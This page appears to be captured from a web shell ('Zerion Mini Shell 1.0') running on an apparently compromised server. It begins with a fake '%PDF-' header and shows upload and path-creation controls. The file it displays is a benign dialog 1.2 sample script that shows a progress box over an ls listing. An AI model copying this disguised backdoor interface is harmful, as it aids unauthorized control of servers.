%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/data/old/usr/share/doc/dialog-1.2/samples/
Upload File :
Create Path :
Current File : //proc/self/root/data/old/usr/share/doc/dialog-1.2/samples/progress

#!/bin/sh
# $Id: progress,v 1.5 2010/01/13 10:20:03 tom Exp $

. ./setup-vars

. ./setup-tempfile

ls -1 >$tempfile
(
while true
do
read text
test -z "$text" && break
ls -ld "$text"
sleep 1
done <$tempfile
) |

$DIALOG --title "PROGRESS" "$@" --progressbox 20 70

Zerion Mini Shell 1.0